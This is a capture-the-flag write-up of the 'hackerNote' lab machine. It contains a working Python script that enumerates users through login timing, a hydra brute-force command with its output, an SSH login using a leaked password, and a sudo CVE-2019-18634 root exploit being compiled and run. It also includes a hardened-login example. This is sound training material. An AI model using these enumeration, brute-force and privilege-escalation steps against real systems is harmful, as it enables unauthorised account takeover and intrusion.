hackerNote is a custom webapp which we have to test using basic enumeration and
exploitation skills.
IP: [Link]
Nmap scan results.
root@LAPTOP-U5913CMD:/home/akshay# nmap -A -T4 [Link]
Starting Nmap 7.80 ( [Link] ) at 2020-10-05 12:42 IST
Nmap scan report for [Link]
Host is up (0.16s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 [Link] (RSA)
| 256 [Link] (ECDSA)
|_ 256 [Link] (ED25519)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Home - hackerNote
8080/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Home - hackerNote
No exact OS matches for host (If you know what OS is running on it, see
[Link] ).
TCP/IP fingerprint:
1) Which ports are open? (in numerical order)
-> 22,80,8080
2) What programming language is the backend written in?
-> Golang
There is a login page on the website, and it discloses a lot of detail while logging in:
when the username exists, the server responds differently (its response time differs) even if the password is wrong.
So this can be used to enumerate users.
We will write a script to measure this, using [Link] as the username
list.
We will use the requests library from Python to make the POST requests.
Script:
#!/usr/bin/env python3
import requests
import json
import time

# The username list path and the login URL are elided in the original ("[Link]"); fill in your own.
username_file = open("[Link]", "r")   # username list
url = "[Link]"                         # login endpoint (the API path used later with hydra is /api/user/login)
usernames = []
timings = dict()

for line in username_file:
    usernames.append(line.replace("\n", ""))

def doLogin(user):
    # Any fixed wrong password will do; we only care how long the server takes to reject it.
    creds = {"username": user, "password": "123"}
    response = requests.post(url, json=creds)
    if response.status_code != 200:  # This means there was an API error
        print("Error:", response.status_code)

for user in usernames:
    start = time.time()
    doLogin(user)
    end = time.time()
    timings[user] = end - start
    time.sleep(0.01)

print("Finished POST Requests")
largestValue = max(timings.values())
smallestValue = min(timings.values())

# Users whose attempt took close to the slowest response are flagged as valid.
for user, elapsed in timings.items():
    if elapsed >= largestValue * 0.9:
        print(user + " is likely a valid user")
james is likely to be a valid user
james is the valid user, so we can brute force the login page.
3) How many usernames from the list are valid?
-> 1
4) What are/is the valid username(s)?
-> james
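As an added example (not part of the original writeup or the room's code), the server-side cause of the timing leak the script above measures, and the fix: a vulnerable login handler returns early for unknown usernames and only runs the slow password hash for real ones, while the hardened handler always does the same amount of work and returns the same result either way. The user store, salt and password are constructed; PBKDF2 stands in for whatever slow hash the real backend uses.

```python
import hashlib
import hmac
import os
import time

ITERATIONS = 100_000  # PBKDF2 work factor; this is what makes a real login "slow"

def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)

# Constructed user store: one account with a made-up password (not the room's credentials).
_SALT = os.urandom(16)
USERS = {"james": (_SALT, hash_password("example-pass", _SALT))}

# Fixed dummy record so an unknown username costs exactly one hash computation too.
_DUMMY_SALT = os.urandom(16)
_DUMMY_HASH = hash_password("dummy", _DUMMY_SALT)

def login_vulnerable(username: str, password: str) -> bool:
    """Leaks user existence: unknown users are rejected before any hashing is done."""
    record = USERS.get(username)
    if record is None:
        return False
    salt, stored = record
    return hmac.compare_digest(hash_password(password, salt), stored)

def login_hardened(username: str, password: str) -> bool:
    """Same work (and, in a real API, the same error message) for every username."""
    known = username in USERS
    salt, stored = USERS[username] if known else (_DUMMY_SALT, _DUMMY_HASH)
    ok = hmac.compare_digest(hash_password(password, salt), stored)
    return known and ok  # a password matching the dummy hash must still fail

def median_response_time(login, username: str, trials: int = 5) -> float:
    """Median wall-clock time of a wrong-password attempt, as the enumeration script measures it."""
    samples = []
    for _ in range(trials):
        start = time.perf_counter()
        login(username, "wrong-password")
        samples.append(time.perf_counter() - start)
    return sorted(samples)[trials // 2]

def leaks_user_existence(login, threshold: float = 0.5) -> bool:
    """True when an unknown user is answered in well under half the time a real one takes."""
    real = median_response_time(login, "james")
    fake = median_response_time(login, "no-such-user")
    return fake < real * threshold
```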
Wrong credential encoding Hint: My favourite colour and my favourite number
We can create a wordlist by combining favourite colours with favourite numbers.
5) How many passwords were in your wordlist?
-> 180
root@LAPTOP-U5913CMD:/home/akshay/Desktop/hackerNote# hydra -l james -P [Link] [Link] http-post-form "/api/user/login:username=^USER^&password=^PASS^:Invalid Username Or Password"
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in
military or secret service organizations, or for illegal purposes (this is non-
binding, these *** ignore laws and ethics anyway).
Hydra ([Link] starting at 2020-10-05 [Link]
[DATA] max 16 tasks per 1 server, overall 16 tasks, 180 login tries (l:1/p:180),
~12 tries per task
[DATA] attacking
http-post-form://[Link]:80/api/user/login:username=^USER^&password=^PASS^:Invalid Username Or Password
[STATUS] 48.00 tries/min, 48 tries in 00:01h, 132 to do in 00:03h, 16 active
[80][http-post-form] host: [Link] login: james password: blue7
6) What was the user's password?
-> blue7
Your notes:
My SSH details
So that I don't forget, my SSH password is dak4###37b
7) What's the user's SSH password?
-> dak4####7b
root@LAPTOP-U5913CMD:/home/akshay/Desktop/hackerNote# ssh james@[Link]
The authenticity of host '[Link] ([Link])' can't be established.
ECDSA key fingerprint is SHA256:le4aVVewKygXBn8lnt/vTK7VskXafxS0FKdZtszhOUg.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[Link]' (ECDSA) to the list of known hosts.
james@[Link]'s password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-76-generic x86_64)
* Documentation: [Link]
* Management: [Link]
* Support: [Link]
System information as of Mon Oct 5 [Link] UTC 2020
System load: 0.12 Processes: 86
Usage of /: 49.2% of 9.78GB Users logged in: 0
Memory usage: 7% IP address for eth0: [Link]
Swap usage: 0%
59 packages can be updated.
0 updates are security updates.
Last login: Mon Feb 10 [Link] 2020 from [Link]
james@hackernote:~$ id
uid=1001(james) gid=1001(james) groups=1001(james)
james@hackernote:~$
8) What is the CVE number for the exploit?
-> CVE-2019-18634
root@LAPTOP-U5913CMD:/home/akshay/Desktop/hackerNote/sudo-cve-2019-18634# scp
exploit.c james@[Link]:/tmp/
james@[Link]'s password:
exploit.c 100% 6311 42.1KB/s 00:00
root@LAPTOP-U5913CMD:/home/akshay/Desktop/hackerNote/sudo-cve-2019-18634# scp
james@[Link]:/tmp/
.git/ .gitignore LICENSE Makefile [Link] exploit.c
root@LAPTOP-U5913CMD:/home/akshay/Desktop/hackerNote/sudo-cve-2019-18634# scp
Makefile james@[Link]:/tmp/
james@[Link]'s password:
Makefile 100% 230 1.6KB/s 00:00
root@LAPTOP-U5913CMD:/home/akshay/Desktop/hackerNote/sudo-cve-2019-18634# ls
LICENSE Makefile [Link] exploit.c
root@LAPTOP-U5913CMD:/home/akshay/Desktop/hackerNote/sudo-cve-2019-18634#
james@hackernote:/tmp$ make
cc -Os -g3 -std=c99 -Wall -Wextra -Wpedantic -static -o exploit exploit.c
james@hackernote:/tmp$ ls
exploit Makefile
exploit.c systemd-private-9ba521bd205240aca29e8a88a0a33a4e-systemd-
[Link]-zFyWeF
[Link] systemd-private-9ba521bd205240aca29e8a88a0a33a4e-systemd-
[Link]-rOnd1n
[Link].1
james@hackernote:/tmp$ ./exploit
[sudo] password for james:
Sorry, try again.
# id
uid=0(root) gid=0(root) groups=0(root),1001(james)
#